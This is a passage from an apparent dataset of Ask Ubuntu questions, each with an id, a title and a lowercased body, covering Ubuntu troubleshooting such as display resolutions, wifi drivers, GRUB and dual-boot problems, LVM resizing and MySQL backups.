800x600 '' endsubsection endsection this is my xrandr output : screen 0 : minimum 8 x 8 , current 1024 x 768 , maximum 8192 x 8192 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 connected primary 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0*+ 1360x768 60.0 59.8 1152x864 60.0 800x600 72.2 60.3 56.2 680x384 60.0 59.8 640x480 59.9 512x384 60.0 400x300 72.2 320x240 60.1 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) i 've created a new mode , but when i tried xrand -- addmode it returned to me : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 29 current serial number in output stream : 30 i 've also tried to force to set resolution via nvidia x server settings , apt-get update and apt-get dist upgrade . lshw -c video output : *-display description : vga compatible controller product : g92 [ geforce gts 250 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:19 memory : df000000-dfffffff memory : c0000000-cfffffff memory : dc000000-ddffffff ioport : ec00 ( size=128 ) memory : defe0000-deffffff
518494	how to recover from a bad upgrade	i have 3 computers , 2 running ubuntu under vmware fusion , 1 under parallels . the 2 vmware computers upgraded to 14.04.01 fine , but the parallels one complains that it can not set the display resolution , and that it can not mount /media/psf . i tried a lot of different methods of booting , but everything is unresponsive , and in fact the destop does n't finish displaying the menu bar nor the icon strip or anything for that matter . how do i recover ? can i preserve the files that i have ?
518498	how to install mlpack successfully ?	currently , i am trying to install mlpack to ubuntu 12.04 . when i executed make install , i got the following error . [ 0 % ] built target mlpack_headers linking cxx shared library ../../lib/libmlpack.so /usr/bin/ld : /usr/local/lib/libboost_program_options.a ( cmdline.o ) : relocation r_x86_64_32 against `.rodata.str1.8 ' can not be used when making a shared object ; recompile with -fpic /usr/local/lib/libboost_program_options.a : could not read symbols : bad value collect2 : ld returned 1 exit status make [ 2 ] : *** [ lib/libmlpack.so.1.0 ] error 1 make [ 1 ] : *** [ src/mlpack/cmakefiles/mlpack.dir/all ] error 2 make : *** [ all ] error 2 how can i fix this error and install mlpack successfully ?
518499	looking for an app to manage cloud services	is there any apps in ubuntu that can manage cloud services ? ( sky drive - google drive - drop box and ... . ) something like es file manager in android that can add and manage many cloud services . of course i didnât found any apps for windows that can manage them together in one . if there is any in ubuntu let me know ... thanks
518502	dell inspiron 1545 ethernet and wireless not working : install step by step instructions	i am having the following issue . i am using ubuntu 12.04 and the ethernet along with wlan drivers are not working . i am needing instructions on how to install the wireless drivers through usb . can someone please help me ? i have the proper file , i am just not sure how to install a zip or regular file using ubuntu . this is my first time using a linux based os .
518503	execute a command 20 seconds after the desktop is booted	i try to execute this command at startup of my desktop to enable a three finger tap on my synaptic touchpad : synclient tapbutton3=2 i tried to put it into /etc/local.rc and i tried to put it into the startup programs , but nothing worked . it is strange : right after boot , the three finger tap works , but after about 10 seconds it seems to be reset . where do i have to put this command ?
518504	ca n't find wifi on newly installed ubuntu 14	i just installed ubuntu 14.04 , but i found no wifi on it . i run command : sudo modprobe -r iwlwfi only get : modprobe : fatal : module iwlwfi not found input lspci -vq|grep -i wireless i get nothing while : lspci -vq|grep -i realtek i get 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) lspci -nn |grep -i net i get : 04:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 07 ) how to deal with this ? my laptop is thinkpad e431 thanks
518507	how do i boot into ubuntu ( after installing , it still just boots to windows ) ?	i 've successfully installed ubuntu ( or so i 'm told ) on my dell laptop alongside a clean windows xp install . when i turn on the computer it boots directly into windows with no options given to boot into linux . what am i missing ?
518509	hda realtek and auto-sensing disable	i have a couple different devices using realtek audio chipsets ( one is alc269vc , another is alc262 ) . on both devices ( laptop/tablet type devices , with internal speakers and a headphone jack ) when i have a headphone jack in , the speakers cut-out . disabling auto-mute has no effect . what i desire is to be able to either play both simultaneously , or at least be able to control which one is active via software . apart from trying the auto-mute setting in alsamixer , i 've tried hdajackretask as well with no luck . i 've had this behaviour with ubuntu 12.04-14.04 . any advice on how to proceed next ?
518511	extend lvm with unallocated space of a ssd	i 've cloned my ubuntu 14.04 install from a smaller ssd ( 256gb ) to a bigger one ( 512gb ) . how can i extend my home with the unallocated space ? i usually know how to extand a partition , but i do n't how to deal with lvm . some infos to help you to help me : ) sudo lvdisplay -- - logical volume -- - lv path /dev/aliot -- work-vg/swap_1 lv name swap_1 vg name aliot -- work-vg lv uuid ym1ljd-arxn-23na-wgs8-0ybp-ryiv-rwzy6v lv write access read/write lv creation host , time aliot -- work , 2013-06-24 14:29:45 +0200 lv status available # open 2 lv size 7,86 gib current le 2013 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 -- - logical volume -- - lv path /dev/aliot -- work-vg/root lv name root vg name aliot -- work-vg lv uuid degnqj-5koj-iw6t-fpjx-5xhy-duta-jawvly lv write access read/write lv creation host , time aliot -- work , 2013-06-24 14:31:07 +0200 lv status available # open 1 lv size 23,24 gib current le 5949 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:2 -- - logical volume -- - lv path /dev/aliot -- work-vg/home lv name home vg name aliot -- work-vg lv uuid beexpf-nh3n-1czl-bnlp-eam3-jrpl-wtbu7u lv write access read/write lv creation host , time aliot -- work , 2013-06-24 14:31:17 +0200 lv status available # open 1 lv size 207,13 gib current le 53025 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:3 sudo pvscan pv /dev/mapper/sdc5_crypt vg aliot -- work-vg lvm2 [ 238,23 gib / 0 free ] total : 1 [ 238,23 gib ] / in use : 1 [ 238,23 gib ] / in no vg : 0 [ 0 ] sudo lvs -o +devices lv vg attr lsize pool origin data % move log copy % convert devices home aliot -- work-vg -wi-ao -- - 207,13g /dev/mapper/sdc5_crypt ( 5949 ) root aliot -- work-vg -wi-ao -- - 23,24g /dev/mapper/sdc5_crypt ( 0 ) swap_1 aliot -- work-vg -wi-ao -- - 7,86g /dev/mapper/sdc5_crypt ( 58974 ) df -h filesystem size used available used % mount on /dev/mapper/aliot -- work -- vg-root 23g 11g 12g 47 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 7,7g 12k 7,7g 1 % /dev tmps 7,7g 6,8m 7,7g 1 % /tmp tmpfs 1,6g 1,5m 1,6g 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 7,7g 648k 7,7g 1 % /run/shm none 100m 56k 100m 1 % /run/user tmpfs 4,0g 0 4,0g 0 % /var/cache/apt/archives /dev/sda1 228m 85m 132m 39 % /boot /dev/mapper/aliot -- work -- vg-home 204g 192g 2,2g 99 % /home tmpfs 1,0g 27m 998m 3 % /home/aliot/.cache gparted : thanks in advance for your help ! : )
518513	ubuntu 14.04 on dell xps l701x with geforce gt 435m - low resolution	moving from ubuntu 12.x to 14.04 ( clean install , not an upgrade ) i 've ran into trouble i 've never had before . many times i 've installed bumblebee with the proprietary nvidia drivers , but this time trouble started when i opened nvidia-settings ( `` nvidia x server settings '' ) and discovered there was no longer an area to set my resolution . instead , only sections for `` application profile '' and `` nvidia-settings configuration '' . i ca n't find how to restore my resolution to 1600x900 from the the 1024x768 it seems to be stuck at . there does seem to be a lot of information out there close to my problem , and i found some excellent post including how do i install the nvidia drivers ? , but after two solid days of attempts , i ca n't seem to put the pieces together , and i 'm not really getting anyway when it comes to even understanding my problem better . i 've tried the recommend nvidia-304 , nvidia-current , and a number of drivers including 340 from xorg edgers . i can get bumblebee to work ( for example , i can run optirun glxspheres64 ) but nothing seems to give me my resolution back . at this point , i 'm not sure what would be the best details to provide , but i 'm getting many messages i do n't really know what to make of . i hope something here is a clue . lspci -vnn shows me the following `` unknown header '' message , any time after i 've installed bumblebee : 02:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf106m [ geforce gt 435m ] [ 10de:0dd3 ] ( rev ff ) ( prog-if ff ) ! ! ! unknown header type 7f in all cases , if i attempt to do anything with xrandr , i get : xrandr : failed to get size of gamma for output default when i switch to another shell ( ctl-alt-f1 , etc ) , i 'm constantly getting the following message : intel ips 0000:00:1f.6 failed to disable graphis turbo running nvidia-settings , beside not showing me the options i expect , also says : ** ( nvidia-settings:3545 ) : warning ** : prime : failed to execute child process `` /usr/bin/prime-supported '' ( no such file or directory ) ** message : prime : is it supported ? no error : nvidia-settings could not find the registry key file . this file should have been installed along with this driver at /usr/share/nvidia/nvidia-application-profiles-key-documentation . the application profiles will continue to work , but values can not be preopulated or validated , and will not be listed in the help text . please see the readme for possible values and descriptions . thanks in advanced for any tips !
518516	changing the system settings icon in docky bar	hello i have installed macbuntu and my ubuntu 14.04 looks now like mac os . the only thing that bothers me now is that some icons like the systems setting icon have a too low resolution . is there a way to change the icons maybe with a graphic from the internet ?
518521	installing ubuntu on clean harddrive ?	i 'm currently having some issues . i 'm trying to install ubuntu on my brothers ' computer that has a hard drive with no operating system on and it does n't ask me to use the whole disk , it pops up the installation type and i can click install now or it gives me a root error , and if i click + , - , or change it freezes ! can i have some help ? edit : when i click install now it pops up `` no root file system is defined . plase correct this from the partitioning menu '' and allthe options are shaded out , except + , - , and change ... and each of them will freeze the computer .
518523	boot problem with ubuntu 14.04 in samsung rv411 notebook	i installed ubuntu 14.04 on my samsung rv411 notebook on a partition in parallel with my windows 7 starter ( crap ) , but i ca n't boot it . windows 7 automatically starts and the option to choose another operating system ( as in other pcs ) does not appear . i already changed settings such as uefi boot , legacy and other things that i saw in the tips that i found through searching the web , but without success .
518524	ubuntu boots to desktop background	i have been messing around in ubuntu 14.04 lts , change theme icons and replace some file in system and reboot all i see is desktop background ca n't see panel or menu ca n't access terminal , i follow some video on youtube and google but it did n't help me , i use dual boot ( windows 8.1 and ubuntu 14.04 ) do n't want to reinstall ubuntu because i got important file that cant be back up on windows so is there any way to reset ubuntu to its early point ?
518525	trouble installing ubuntu 14.04.1 on gateway gt5404	i have a gatway gt5404 ( desktop ) with 2gb 's of ram and a newer hdd , and a refresh of windows 7 ultimate . ive tried installing ubuntu via usb by extracting the iso files into the usb , extracting the iso file and then copying it to usb , even using imgburner to write a bootable img to the usb . no matter what i try , after reboot it 'll try and boot via usb and it says `` bootmngr is missing . '' could it be my windows install ? this system came with vista and i wasnt cool with that so i upgraded it to windows 7 . i dont have any dvd 's large enough to write ubuntu onto and would like to focus on usb . i use the desktop as an everyday basic system so if i have to completely format my hdd and install ubuntu on it as a last resort , i will .
518526	wireless issues [ linux mint ]	i was trying to get a linux distro installed , after debian failed i turned to ubuntu , or more specifically linux mint 17 , when i logged in to the installer , i found that my wireless was n't working . this is strange because in every other linux mint/ubuntu installation i 've done , wireless cards are recognized automatically , i continued the installation until the end using ethernet , when i logged in , i could n't turn on wifi . so i went to the magical google.ca and found the command inxi -n which returned this : network : card-1 : realtek rtl8101e/rtl8102e pci express fast ethernet controller driver : r8169 if : eth0 state : up speed : 100 mbps duplex : full mac : e8:40 : f2 : f0:65:57 card-2 : realtek rtl8188ce 802.11b/g/n wifi adapter driver : rtl8192ce if : wlan0 state : down mac : 74 : e5:43:3b : c2:38 the important bit being the second part , where it says state : down i looked around a bit more and found a script , which when ran , this caught my eye : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes can anyone help me ? i downloaded this on a laptop , and i really dont want to have to keep this laptop stationary like a standard desktop
518529	clean install of 14.04 on dell vosro 400 with dual screen setup boots to black screen with working cursor	i am installing ubuntu 14.04 lts 64-bit on my dell vostro 400 , but upon every attempt to boot , i only get a black screen with a working cursor . it is set up with a nvidia geforce 7300 le videocard ( did n't originally come with the computer ) and two monitors , which i am afraid may somehow be causing the problem . i used to have ubuntu 12.04 lts 64-bit with xorg drivers for the card , but i formatted the hard drive , which should have completely removed them . any ideas ? i really need this computer before school starts on september 2nd . just a side note , the bug may have been fixed since i made the installation dvd , which was made just before 14.04.1 came out . new information i have tried installing different versions of ubuntu in my free time , and so far , ubuntu 12.04.3 has worked . but it is still having problems , mainly that according to its display settings , it thinks it is on a laptop , when it is really on a desktop . it also does not recognize my other monitor . however , both displays are mirrored with the ubuntu logo and the loading dots that change color during startup and shutdown . now what ? i 'll settle for ubuntu 12.04 , and maybe even 10.04 if it will work . newer information i finally got ubuntu 12.04 to work , even though it 's not the version i was hoping for . all i had to do was go into the additional drivers program , and install the `` ( recommended ) '' version of the driver . then after a reboot , my second monitor was recognized , and my desktop was extended on to it .
518532	problems booting from software raid	tl ; dr : created raid 1 at installation of ubuntu desktop but it wo n't boot after seemingly successful installation , although boot utility seems to indicate that grub is installed i am trying to set up an instance of ubuntu desktop ( 12.04.5 ) which boots from a raid 1 device . i 'm using an alternate installation cd in order to configure a software raid from which to boot . i am using four 2 tb drives ( sdf-sdi ) to create three raid 1 devices : two 4 gb partitions across sdf and sdg as swap space two 2 tb partitions across sdf and sdg as ext4 , with the bootable flag set , mounted at / two 2 tb partitions across sdh and sdi as ext4 , mounted at /home/ i set up the partitions with the help of a tutorial i found on youtube for installing ubuntu 12.04 server ; this is the procedure i used for each partition pair : create partition on empty drive ( 4 gb for the swap , remaining space for the ext4s ) set as `` physical volume for raid '' ( set bootable flag on partition mounted at / ) create identical partition on the physical device that this partition will be paired with select `` configure software raid '' > `` create md devices '' , and configure a raid 1 device with two drives and zero spares select the two matching partitions and finish md configuration select new raid 1 device and set the `` use as '' option ( swap/ext4 ) as well as the mount point for the ext4 partitions ( / and /home/ ) from here i select `` finish partitioning and write changes to disk '' , select the default of no when confronted with the option to boot from a degraded raid , and confirm the changes . afterward the installation continues as normal and eventually i hit a screen indicating `` this new installation is the only operating system on this computer '' and prompts me to install the grub boot loader to the mbr . i select yes and at the bottom of the screen see the command : grub-install /dev/sdf /dev/sdg the installation finishes without any errors and ejects the cd , but upon restart i am greeted with : reboot and select proper boot device or insert boot media in selected boot device and press a key i went back to do a sanity check and ended up just going through the process again only to get the same results . then i put the ubuntu boot-repair iso on a usb stick and booted into that , and get a couple of messages upon startup : '' raid detected . you may want to retry after installing the [ mdadm ] packages . '' `` warning : no active raid '' from here it does not give me the option of repairing , just the option to create a `` bootinfo summary '' , which i did ( http : //paste.ubuntu.com/8200097/ ) . i 'm not sure i understand the errors from the boot-repair utility , specifically 1 ) how i 'm supposed to install mdadm if i ca n't boot in the first place and 2 ) where the option to set an active raid device was . any suggestions on what the issue might be and how to proceed ?
518533	problem when trying to install fpdb on ubuntu machine	i 've been trying to get fpdb working on my ubuntu desktop , but every time i try to install it from the gz file , my system wo n't let me use ./configure ( saying file not found ) , and when i try to install it from the deb file , i get spencer @ spencer-system-product-name : ~ $ fpdb python 2.7 ... traceback ( most recent call last ) : file `` /usr/bin/fpdb '' , line 85 , in < module > import detectinstalledsites file `` /usr/share/pyshared/fpdb/detectinstalledsites.py '' , line 47 , in < module > config=configuration.config ( ) file `` /usr/share/pyshared/fpdb/configuration.py '' , line 805 , in __init__ game = game ( node = game_node ) file `` /usr/share/pyshared/fpdb/configuration.py '' , line 397 , in __init__ self.rows = int ( node.getattribute ( `` rows '' ) ) valueerror : invalid literal for int ( ) with base 10 : '' i 'm something of a novice , so do you know anything that could help me properly install fpdb ? also , i can not find an installation manual for fpdb anywhere for installation on ubuntu . also , whenever i run the run_fpdb.py file , i get : [ 'matplotlib/gtk ' , 'file not found : pylab ' , 'file not found : beautifulsoup ' , 'file not found : wnck ' ] does anybody know if i 'm lacking certain repositories or files , or if i need to adjust something to install fpdb ?
518534	get file created by a program launched by a bash script	i have the next scripts : | base_dir/ | - test.sh | | tests/ | | - elaborato.sh test.sh run elaborato.sh elaborato.sh could create a file ( not always it create a file ) . i need : to know the name of the created file ( if created ) ; to copy the file created ( if created ) inside the directory `` tests '' ... i am trying to use the following code : $ ( strace bash `` $ testdir/elaborato.sh '' $ parameters < `` $ testdir/stdin '' > `` $ testdir/stdout '' 2 > `` $ testdir/stderr '' 2 > & 1 > | grep '^open ( . *o_creat ' | cut -d\ '' -f 2 ) where testdir=base_dir/tests . as you can see i need to redirect stderr to my stderr file and stdout to my stdout file and in the end i need to take the file created by elaborato.sh and move it in another folder . stdout and stderr file are correctly created inside the tests dir . but i really do not understand why the file that is created by elaborato.sh is created inside base_dir and not inside tests . it is this the reason i need to copy the created file inside another directory . otherwise i would need to solve just the first point . any idea ?
518536	battery notification on ubuntu	i want to get ubuntu 14.04.1 lts to notify me about battery when it hits 50 % . how can i do that ?
518537	wifi keeps disconnecting in 14.04	i am brand spanking new to ubuntu and finally got it up and running . now , it just keeps randomly disconnecting and will reconnect after some number of tries . it seems to stay connected if i keep on the internet but soon after i leave , it disconnects . i keep having to go to windows , like now .
518540	ubuntu 14.04 does not start installation	i 'm trying to install ubuntu 14.04 on a pc with uefi and windows 8.1 x64 . i am using a usb installation , ubuntu starts and show initial purple screen , after i get the following screen and the pc frozen here . what is happening ? my pc has an asus motherboard .
518542	i have ubuntu version 14.04 with updates installed and each time it boots it displays `` enter password to unlock your login keyring prompt	i wish ubuntu would redesign the `` keyring '' to have a disable for it ! i am the only user of my computer and ubuntu 14.04 , so there is no need to have the `` enter password to unlock the login keyring ! i am really tired of booting and having to enter my password each time .
518544	screenshooter hangs xfce4	several times over the last 48 hours i have had to reboot my way out of an xfce4 hang where the mouse and keyboard cease responding in the gui . a pattern has emerged whereby this happens just after i have taken a screenshot using xfce4-screenshooter . on @ aquaherd 's advice i found that sudo service lightdm restart did at least remove the need for a full reboot . is there any way i can fix this problem ? original question several times over the last 24 hours i have had to reboot my way out of an xfce4 hang where the mouse and keyboard cease responding in the gui . when this happens i am able to use ctrl-alt-f1 to get to tty1 and i can login there by any attempt to bring xfce down ( such as xfwm4 -- replace , xfce4-session-logout or sudo service dbus restart ) ultimately results in me having to issue a reboot command . i 've seen some indication that the hang might be dbus related ( sorry i did n't take a specific note ) . also i think both of the latest problems have occurred within a few seconds of me taking a screenshot . i would like suggestions on what i can do to pin the problem down and fix it . thanks
518545	ubuntu freezes while using terminal and firefox	hi i am extremely new to programming . i downloaded ubuntu 14.0 and it keeps freezing while i am using firefox and while using the terminal . i would really like for someone to give me some insight into what might be happening . i am using a samsung laptop and it has windows7 , intel core5 and nvidia graphics card i believe . i installed ubuntu as a dual os on my laptop if that makes a difference . also while in the terminal i was using python 3 . all suggestions are greatly appreciated .
518546	is syncing a mysql database with dropbox this easy , and is it a backup solution ?	maybe i 'm wrong , but i was sure that some time ago when i was looking for a way to sync my mysql databases using dropbox , i was told that this was not possible because of the way mysql works . but i just recently came across this answer , which seems to indicate that one can sync a mysql database on dropbox , simply by using symlinks . it seems too easy to be true , given than i thought i had been advised against it before . so my first question is , does the answer linked above apply to my situation ? in my situation , i only want to sync some mysql databases across two computers , my desktop and laptop , and i will be the only one accessing them . the databases are for locally tested websites . my next question is , what happens if my laptop explodes , and i get a new one ? can i just symlink to the databases on dropbox and be on my way ? does this method work as an effective backup tool ? if for some reason i wanted to add a third computer , could i just symlink it and go ?
518547	pokemon trading card game online for ubuntu ?	is possibilite to play pokemon trading card game online in a ubuntu 14 ? there are a link here but i tried to use wine , but appear a massege error . this game run only for windows and mac os . thanks so much !
518552	networking - how to allow from second lan interface to access first lan interface ?	i have one box with 2 ethernet interface : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 192.168.2.1 netmask 255.255.255.0 # network 192.168.1.0 gateway 192.168.2.1 # broadcast 192.168.1.1 dns-nameservers 195.130.131.11 192.130.130.139 now eth0 is connected to main internet and eth1 is connected with another laptop windows 7 which has ip : 192.168.2.2 but windows 7 cant ping my eth0 ip . how can i make it possible ?
518554	unknown password on ubuntu 13.04	i have ubuntu 13.04 set up to dual boot with windows 7 using grub . i barely remember changing my password to something `` brilliant , '' but i have no idea what it is . i 'm new at this stuff , but i do know how to use the terminal and how to get to root . speaking of which , when i booted into the shell , it said it needed a password for maintenance ? if anyone could help me change my password , that would be great . and an explanation for the `` password for maintenance '' thing would be awesome , too . thanks !
518556	make services request permission to open ports ?	is there a way to make services request permission to open ports ? basically to start up with all ports closed , as root so services will have to request permission to open them ? , and you can decide to allow or deny the port to open . i’ve done an port scan with zenmap and there are several ports that are unnecessary open , and i don’t know what is coming in and leaving the system , especially form port 443 , which is going to tor so wireshark doesn’t really help . ( 12.04 )
518559	how to install a downloaded .deb file	i am new to ubuntu . i installed a ubuntu a few days back . i downloaded a deb files . but i do n't know how to install it . can anyone tell me how to install a downloaded deb file ?
518564	caching nameserver and primary master and or secondary master on the same host	may i know if we could run caching nameserver and primary master and or caching nameserver and secondary master on the same host ? and can i also run primary master and secondary master on the same host ?
518565	use the windows 8 bootloader for dual boot instead of grub	okay so this has been a goal almost a year now . i still have n't figured out so i am just going to finally ask this question . here are things i am sure you need to know : my computer - ativ book 8 runs ubuntu 14.04.1 and windows 8.1 pro came preinstalled with windows 8 so i it is uefi based so i have tried using easybcd 2.2 but i have had terrible exp with it . i added the entry in and everything but it still wants to boot grub before the windows bootloader . does anyone have any suggestions ? i 'm sure one of you guys know what to do hopefully . : / edit : ok so if i boot the computer i get this windows 7 bootloader with ubuntu that does n't work . if i boot windows and hold the shift key i get the the windows 8 boot menu but ubuntu does n't work still . buuuut if i go to `` use a device '' and pick ubuntu , it will boot up ubuntu . i 'm soooooo confused why the the entry does n't work and why i get this windows 7 bootloader . the error or something is \efi\ubuntu\shimx64.efi by the way . the other is \efi\ubuntu\grubx64.efi edit2 : so if boot into ubuntu after picking `` use another device '' and then shut down and then turn the computer on later i get the windows 7 boot selection . ubuntu wo n't boot but windows 8.1 will . after selecting windows 8.1 i get the windows 8 boot selection . why is it doing that ? i do n't understand !
518566	how to install a macromedia dreamweaver using wine	i need to install macromedia dreamweaver in ubuntu14.04 . i have wine1.6 installed in my system . i have a setup file of macromedia dreamweaver of windows . is there possible to install windows setup file directly in ubuntu using wine ? if is it possible , i need to know installation steps .
518568	upgrading to 14.04 lts ( trusty tahr ) blew up grub	i used the upgrade option available at the ubuntu store from the desktop . there was an option within the software updates to upgrade to 14.04 lts ( trusty tahr ) . after i employed this to upgrade , ubuntu will not boot and i 'm at the grub rescue prompt just after the bios screen . i do not make it to the ubuntu splash screen . i researched a bit and now have a bootable thumb drive that i would like to boot to after pressing the f9 key . i then would like to use the portable ( thumb-drive/cd ) os to fix my grub issue , so that i can boot up normally and begin enjoying ubuntu 14.04 lts ( trusty tahr ) . my questions are the following . am i on the correct path to fixing my issue ? and also , how can i fix the grub os loader using my portable os ( that is on my thumb-drive ) ? i would be grateful for any information that would lead to a solution regarding my issue .
518573	why is ubuntu suddenly crippling my network ?	i 'm running xubuntu 14.04 64-bit . i have recently started noticing randomly that my wireless adaptor suddenly becomes a jamming device for the network i 'm connected to ! i see 0kbit/s in my network meter incoming , but 200kbit/s going out on the wlan0 interface . suddenly , everyone on the network i 'm connected to begins having connectivity issues . this only happens when my laptop is on , connected via wifi , and on ubuntu . i have been able to reproduce the issue on a live session as well . here is some infos : westj @ twilightsparkle : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' goat simulator 2013 '' mode : managed frequency:2.447 ghz access point : 14 : d6:4d:32 : db:98 bit rate=65 mb/s tx-power=20 dbm retry short limit:7 rts thr : off fragment thr : off power management : off link quality=38/70 signal level=-72 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:664 invalid misc:794 missed beacon:0 westj @ twilightsparkle : ~ $ sudo lshw -c network [ sudo ] password for westj : *-network description : wireless interface product : rt3290 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : wlan0 version : 00 serial : 68:94:23 : cd : c3 : ef width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.16.1-031601-generic firmware=0.37 ip=192.168.1.100 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : c3510000-c351ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 05 serial : 84:34:97:79 : c8:1a size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:3000 ( size=256 ) memory : c3404000-c3404fff memory : c3400000-c3403fff i would be very grateful for any help you can give me ! [ edit ] someone told me this would help too : http : //pastebin.com/vh1rvuxf
518574	lsb-graphics in very bad inconsistent state	i was trying to install the printer driver for brother hl-2280dw , but i had to stop it due to the printer not appearing to any of the pcs anymore . after i stopped it i noticed this error when i attempt to perform a apt-get upgrade . here 's a snippet of what output i receive : sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/2,834 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y dpkg : error processing package lsb-graphics ( -- configure ) : package is in a very bad inconsistent state ; you should reinstall it before attempting configuration errors were encountered while processing : lsb-graphics e : sub-process /usr/bin/dpkg returned an error code ( 1 ) is it safe to just remove lsb-graphics forcefully and reinstall it ? i though i should ask first instead . edit i went ahead and removed it using dpkg -- remove -- force-remove-reinstreq and then reinstalling it with apt-get install . is there anything that i have to reconfigure , or is it fine as is ?
518576	my ubuntu 12.04 takes hours before it load	firstly it started with not loading on time , showing different errors when starting up..errors like : error couldnt load files error hd0 out of disk ' unknow files system grub rescue and so on but it will later load eventually.. , ..but recently it stated hard pressing the dot key ( . ) it self continuously and when i try to delete it using del key it would n't stop but rather continue the dot key like dis ... ... ... ... ... ... ... continuously , but that does n't happen if i log on to my window 7 partition . later mouse insnt working on it and later both ubuntu and window are not loading again until now that my ubuntu just load in and working properly , ..what do u guys think is going on and what can i do to stop it when it start again
518577	installing flash for other browsers so it will work with steam ?	i have ubuntu 14.04 and i 'm trying to install flash for other browsers via tar.gz i just do n't know where to put the files though so it would work with the steam web browser .
518581	how to fix curl : ( 7 ) could n't connect to host	i got a problem on how will i post data in my localhost using curl in linux shell with : curl -h `` content-type : application/json '' -d ' { `` name '' : '' watch '' , '' price '' : '' 343.45 '' } ' localhost/symfony/web/app_dev.php/product/new but it always ends up with : curl : ( 7 ) could n't connect to host
518584	how can i dump and restore mysql databases to and from dropbox from the command line ?	i have a few mysql databases that i would like to sync between two computers . what i 'd like to do is be able to have a quick command or script on one computer that i can use to quickly dump the databases to a folder on my dropbox . then have a similar restore script that i can use to overwrite the existing database on the second computer . the first step seems easy . i am able to create a quick .sql file with the following command : mysqldump -u root -p mydatabase > /home/dave/dropbox/mysql/mydatabase.sql it 's the other side where i 'm having trouble . apparently , mysql wo n't easily let me overwrite the contents of an existing database with new contents . i 've tried two approaches , and neither worked . first i tried mysqlimport , but it just burped out a bunch of instructions about how to use the command , and after looking around on the web , it seems this is because it simply will not overwrite a database : $ mysqlimport -u root -p mydatabase < /home/dave/dropbox/mysql/mydatabase.sql so i tried to first drop the database , but i got the following error : $ mysqladmin -u root -p drop mydatabase enter password : dropping the database is potentially a very bad thing to do . any data stored in the database will be destroyed . do you really want to drop the 'mydatabase ' database [ y/n ] y mysqladmin : drop database mydatabase failed ; error : 'error on delete of './mydatabase//db.opt ' ( errcode : 13 ) ' is there not a simply command i can use to take the database i dumped from one computer and have it overwrite its counterpart on another computer ? these databases are largely the same in every regard , except for the the small daily changes i make .
518589	wacom connection to lappy	i tried to connect new wacom cth 301 k to my lappy hp-g6-2236tx using ubuntu 14.04 but it shows the options of wacom but did n't recognize the device . can any one help me in fixing this thing please .
518591	qtile/14.04 - battery monitor widget showing `` error ''	i have installed 14.04 on a hp pavilion laptop , and have set up qtile as my wm . i went to install the widget.battery ( ) to display my battery stats , but instead it just says `` error '' . i 've installed apmd and verified that both apmd and apicd are running . anyone have any thoughts on what i need to do to get the statistics to show up ? edit : here are the relevant parts of my config : widget_defaults = dict ( font='terminus ' , fontsize=16 , padding=3 , ) ... widget.battery ( energy_now_file='charge_now ' , energy_full_file='charge_full ' , power_now_file='current_now ' , **widget_defaults ) , thanks .
518593	is google earth 32 bit best for ubuntu 64 bit 14.04 ?	i want to report something amazing . two days ago i tried to install google-earth-stable 64 bit for ubuntu along with the required dependencies . when i tried to install it via ubuntu software center i got the same old error - ia32 libs dependency . then when i tried to switch on my dell vostro desktop i got a pink screen with grub options . i got nervous as it is only 2 weeks ago that i lost all my data and had to work from scratch again . i clicked the normal grub option ( do not remember what it was ) and then worked away . today morning i saw a red button and an error on top right hand screen that said partial updates . ubuntu not only removed the google -earth software but the dependencies as well plus fixed the boot record file . that was amazing ! anyways to my relevant question - is the 32 bit google -earth.deb file best for ubuntu 14.04 ubuntu ? because with all the other dependencies being installed it still crashes .
